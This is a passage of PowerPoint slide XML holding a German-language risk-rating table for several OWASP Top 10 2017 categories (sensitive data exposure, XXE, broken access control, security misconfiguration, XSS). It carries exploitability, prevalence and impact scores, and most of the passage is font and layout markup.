                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7,0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393205">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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-Verlust der</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Vertr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sens.</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Daten</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr häufig: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="950" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwerwiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7,0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93205">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A4:2017-XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exter-nal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Entities (XXE)</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Häufig: 2</a:t>
                      </a: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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwerwiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7,0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A5:2017-Fehler in </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zugriffskontrolle</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="0">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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Häufig: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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de-DE" sz="950" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Durchschnittlich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwerwiegend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="0">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a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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4400579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="366522">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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Sicherh.rel.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fehlkonfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr häufig: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="950" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mittel: 2</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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6"/>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A7:2017-Cross-Site Scripting (XSS)</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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sehr häufig: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="9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de-DE" sz="950" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Einfach: 3</a:t>
                      </a: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de-DE" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mittel: 2</a:t>
                      </a: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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="800" b="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kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>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7"/>
                  </a:ext>
